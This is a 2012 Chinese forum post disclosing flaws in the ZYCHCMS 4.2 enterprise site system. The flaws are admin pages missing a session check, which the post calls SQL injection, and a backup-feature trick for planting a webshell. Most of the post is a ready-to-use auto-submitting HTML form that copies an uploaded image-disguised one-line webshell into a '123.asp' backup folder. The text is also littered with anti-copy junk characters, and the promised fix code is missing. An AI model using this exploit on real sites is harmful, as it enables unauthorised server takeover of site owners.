找回密码
 立即注册
查看: 2472|回复: 0
打印 上一主题 下一主题

ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:09:51 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

' v6 w5 Y) _  p
6 R' y) u9 r  U* G- H7 {; }1 f: L; p' |6 Z

2 V7 {5 r+ i6 l  J- A影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
2 \# T* ~7 m# _  s: P% S( U( b ①SQL注射漏洞
5 q7 B  \' n4 Q2 g) O4 s) _ 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
2 Q7 f4 e3 [! F2 ~" Q" _! B' H 漏洞原因:未过滤! r" V$ [, \/ ]2 `) X: Q% K0 n
漏洞代码:0 y( @3 ?, [" {! V
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
+ J( q3 j( Y- f+ M' n( M1 T9 s  m 修复方法:在文件开头加入代码' }2 J5 N% i7 P/ z  C9 d) D0 g

7 D& U2 n$ E9 L# ~5 I/ Z
" R0 g- o/ E: ~, D. M: x②后台拿WBSHELL0 d' y, E$ N9 L! |6 |# A
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。6 ~2 O. E) \- a
这里在网上找了一个,改了下,将就着用。
! L5 w! S+ G0 t% h6 Q" Q& G 以下是代码本地提交代码
, x; [' [. f+ L& B* X 7 n" A4 b9 ~/ |0 M5 c! I
, L8 k; ?7 F8 \5 D% |
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
% H/ k9 m7 ]1 _: h# @" W# ] <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
. V4 O) L- s- o; r <tr>+ o4 V# P3 C* ~9 w: W2 I1 j
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
& B, I6 G7 n4 O* ]' P8 V </tr>
8 A7 b! ~/ i$ g5 |$ L* g/ u <tr>& F  I- K5 A1 H3 C9 B
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
+ H: e, u1 H" j1 T$ O2 k </span>2 W4 t: i' C5 o' s$ o8 i6 T6 C
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
# f" L8 Q; T0 {# _ <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
3 u  h+ E5 _' S <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>! |2 ]! p: p* w' [- b+ b" [; G5 K
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d/ g( M5 `7 P$ _2 F  L& }+ p
<div align=”left”>' s/ o3 {( _# d' h6 e
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
0 F3 ?5 R4 l% {+ S! n' F1 z# H <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
) w& J" Z! O( O <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />! Z2 Q% X# i+ f6 @8 f4 ~! J3 d
</div></td>
! S$ k3 H0 G& W4 W5 ] </tr>! }. Q2 Z) r4 y5 t6 C; A
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
- I- M5 l  ?5 G5 {: ~4 r: P4 Z <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>* X7 S7 b6 v+ H) y+ m6 i
<td class=”td”><div align=”left”>, s1 p; P/ _% @' ]& k4 J6 E) q7 `
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />  ]' j+ z4 U/ M; F4 I* z; H
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>4 x! O. {' l' v0 |' f- @1 N
</tr>
9 Y, Z  {* D# q. \; t; o8 u- a <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>' ]( w' h% @$ ]) G& e8 E" N) J' T
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
" J/ q. B5 ^9 i( r1 ~1 L: g! q. s <td class=”td”><div align=”left”>  t. C! j; i* ~
<input type=”submit” value=”确定备份” class=”btn”& P" l+ `( T1 O( h, _' @- J
</div></td>% }6 J& c! K, x* M* t4 G' t7 z' f
</tr>+ Z& w1 V9 f# p7 Y
</table></td></tr></form>
1 Q$ x$ d- O  |* @ </table>
' D( }6 k2 ]) d# a: [ </td>
$ A6 h- O) @7 a' s8 B </tr>' k3 c1 ?$ k6 B4 n+ T
</table>
9 g" ]; c2 T  n <script>
7 l; a, [0 [. T document.all.add.submit();! Z: l  M' u( `; n- e  h
</script>
! h2 Y, M4 s0 `: U % U7 D: V* d# r6 n+ w6 E
" i4 T2 ]. W0 e+ d, V; \
" v8 W, l2 m! ?; G6 I0 r, }
5 @6 p% _6 D+ c* D

: M: S/ x: k3 m: r! v% v, K8 T3 Q3 F4 ^' a9 y# Z7 G. m8 a

/ O! h" q$ [* K  e' V" y
5 r# k# @/ b; m/ ~0 [: l8 [: s& I2 p8 S, J0 h
3 s+ |; [4 F7 _. b
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表